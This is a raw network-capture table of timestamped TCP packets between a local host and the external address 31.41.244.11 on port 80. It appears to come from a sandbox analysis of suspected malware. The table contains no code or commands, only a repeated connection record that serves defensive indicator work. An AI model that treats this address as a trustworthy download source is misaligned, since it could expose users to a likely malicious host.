Jan 7, 2025 10:09:04.664501905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.664535999 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.664535999 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.664550066 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.664566994 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.664578915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.664588928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.664613008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.664617062 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.664625883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.664637089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.664660931 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.664669037 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.664758921 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.664769888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.664781094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.664793968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.664809942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.664810896 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.664820910 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.664822102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.664835930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.664849997 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.664885998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.664889097 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.664897919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.664910078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.664963007 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.664963007 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.664988041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.664999962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.665011883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.665023088 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.665033102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.665036917 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.665045977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.665055990 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.665056944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.665085077 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.665110111 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.667056084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667067051 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667078018 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667129993 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.667191029 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.667207956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667221069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667237043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667248964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667260885 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667262077 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.667283058 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.667316914 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.667342901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667355061 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667363882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667373896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667385101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667401075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667413950 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.667413950 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.667426109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.667470932 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.667500973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667512894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667522907 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667534113 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667551994 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667562962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667572975 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667583942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667593956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667601109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.667601109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.667604923 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667639971 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.667639971 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.667706966 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.667717934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667728901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667737961 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667747974 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667772055 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.667848110 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.667927980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667951107 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667960882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667970896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667975903 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.667984009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667994022 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.667996883 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.668004036 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.668016911 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.668028116 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.668036938 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.668040991 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.668056965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.668070078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.668078899 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.668078899 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.668080091 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.668092012 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.668102026 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.668133020 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.668133020 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.668148041 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.668325901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.668343067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.668354034 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.668363094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.668371916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.668405056 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.668497086 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.694721937 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.694732904 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.694744110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.694793940 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.694829941 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.694850922 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.694861889 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.694870949 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.694881916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.694924116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.694924116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.694930077 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.694941044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.694952011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.694960117 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.694963932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.694982052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.694996119 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.695012093 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.695028067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.695034027 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.695040941 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.695074081 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.695076942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.695086956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.695086956 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.695137024 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.695152044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.695163012 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.695173025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.695204020 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.695225000 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.695261955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.695272923 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.695283890 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.695348024 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.695348024 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.717777014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.717798948 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.717813969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.717823982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.717833996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.717844009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.717845917 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.717875957 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.717895031 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.717907906 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.717920065 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.717993021 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.750735998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.750751972 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.750761986 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.750811100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.750821114 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.750832081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.750838995 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.750859022 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.750869989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.750885010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.750895977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.750896931 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.750907898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.750917912 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.750933886 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.750962973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.750967026 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.750973940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.750983953 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.751003981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.751013994 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.751030922 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.751038074 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.751038074 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.751044035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.751075983 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.751075983 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.751089096 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.751099110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.751107931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.751154900 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.751154900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.751168013 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.751177073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.751194954 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.751215935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.751225948 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.751225948 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.751236916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.751276016 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.751276016 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.751291990 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.751302958 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.751317024 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.751384974 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.751394033 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.751404047 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.751405001 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.751415968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.751426935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.751436949 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.751457930 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.751457930 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.751485109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.751502037 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.753309011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753323078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753334045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753344059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753371000 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753381014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753390074 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753400087 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753408909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753417969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753426075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753433943 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.753433943 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.753437996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753449917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753485918 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.753511906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753521919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753530979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753540993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753547907 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.753547907 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.753566980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753576994 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753586054 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753596067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753602982 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.753607035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753633022 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.753654003 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.753662109 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753671885 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753683090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753705978 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753730059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753732920 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.753741980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753753901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753770113 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753793001 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.753793001 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.753808022 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753808975 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.753818989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753833055 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753844023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753863096 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.753885984 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753897905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753906965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753925085 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.753933907 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.753966093 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753981113 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.753983021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.753994942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.754004955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.754014969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.754024029 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.754024029 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.754050016 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.754079103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.754090071 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.754091024 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.754103899 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.754115105 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.754123926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.754158974 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.754177094 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.754194975 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.754221916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.754232883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.754242897 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.754252911 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.754262924 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.754291058 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.754328966 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.781413078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.781461954 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.781477928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.781486988 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.781497955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.781522989 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.781558037 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.781569004 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.781569958 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.781579971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.781589985 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.781644106 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.781644106 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.781649113 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.781661987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.781672001 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.781697989 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.781698942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.781714916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.781721115 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.781738997 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.781747103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.781752110 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.781790018 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.781807899 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.781902075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.781925917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.781936884 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.781946898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.781969070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.781985044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.781989098 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.781989098 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.781995058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.782006025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.782012939 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.782063961 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.804677963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.804702044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.804729939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.804744959 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.804757118 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.804769039 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.804785967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.804799080 CET	80	50017	31.41.244.11	192.168.2.4
